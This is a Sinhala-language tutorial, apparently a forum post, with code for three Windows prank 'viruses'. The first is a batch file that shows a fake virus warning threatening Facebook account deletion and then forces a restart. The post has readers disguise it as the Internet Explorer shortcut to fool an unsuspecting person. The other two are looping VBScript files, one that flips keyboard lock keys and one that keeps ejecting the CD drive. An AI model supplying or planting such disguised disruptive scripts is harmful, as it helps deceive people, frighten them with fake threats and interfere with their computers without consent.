2) ඊළඟට මම මේ යටින් කියල තියෙන ටික notepad eke type කරන්න.



Quote
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."



3) ඊට පස්සේ එක Internet Explorer.bat කියල save කරගන්න.


4) save කරගත්තු bat file eka right click karala create shortcut kiyana eka click karanna.

5) Right Click කරලා Properties යන්න.

6) Icon එක මේ විදියට Change කරන්න.

7)
Internet Explorer Icon එක ම තෝරාගන්න.

8) දන ඉතින් ඔක්කොම හරි, කරන්න තියෙන්නේ ඇත්ත Internet Explorer shortcut eka delete කරලා මේ තියාගන්න එක. මේක උඩ ක්ලික් කරාම මේ වගේ දෙයක් ඔයාලටත් පෙන්නයි






දන්නේ නැති කෙනෙක් ට මේක පෙන්නුවොත් එහෙම රත් වෙයි, අයි ඉතින් මේකේ කියනවනේ තමන්ගේ Facebook account ekath delete කරනවා කියල.



KeyBord එක පිස්සු නටවන Virus එකක් හදමු

ඉස්සෙල්ල වගේමයි..

1. Notepad
එකක් open කරගන්න.
2.
පහලතියෙන code එක copy කරල Notepad එකට paste කරන්න:


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop



3.
දැන් ඔය Notepad එක save as ගිහින් disco2.vbs කියල save කරන්න.
(
කැමතින මකින් save කරගන්ඩ පුලුවන්. ඒත් .vbs අන්තිමට එන්න ඕනෙ..)

4.
දැන් හැදෙන .vbs file එක double click කරල බලන්න..

දැන් keyboard එක පිස්සුනටන හැටි බලන්නවෙන notepad එකක් අරන් මොනවහරි type කරල බලන්න..

ඕක නවත්තන්නෙත් ඉස්සෙල්ල විදිහටමයි..
TASK MANAGER
එක open කරල(ctrl+alt+del), ඒකෙ "Processes" tab එක click කරන්න.
ඒකෙ තියෙන list එකෙන් "WSCRIPT.EXE" කියල තියෙන file එක හොයල select කරල Delete කරන්න.


CD Rom එක auto open වෙන simple virus එකක්හදමු.

1. Notepad එකක් open කරගන්න.
2.
පහල තියෙන code එක copy කරල Notepad එකට paste කරන්න:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >=1 then
do
For i=0 to colCDROMs.COunt -1
colCDROMs.Item(i).Eject
Next ' cdrom
For i=0 to colCDROMs.COunt -1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


3.
දැන් ඔය Notepad එක save as ගිහින් disco.vbs කියල save කරන්න.
(
කැමතිනමකින් save කරගන්ඩ පුලුවන්. ඒත් .vbs අන්තිමට එන්නඕනෙ..)

4.
දැන් හැදෙන .vbs file එක double click කරල බලන්න..
කොහොමඩ වැඩ..

* CD Rom
එක Auto open වෙනඑක නවත්තන්න TASK MANAGER එක open කරල (ctrl+alt+del), ඒකෙ "Processes" tab එක click කරන්න.
ඒකෙ තියෙන list එකෙන් "WSCRIPT.EXE" කියල තියෙන file එක හොයල select කරල Delete කරන්න.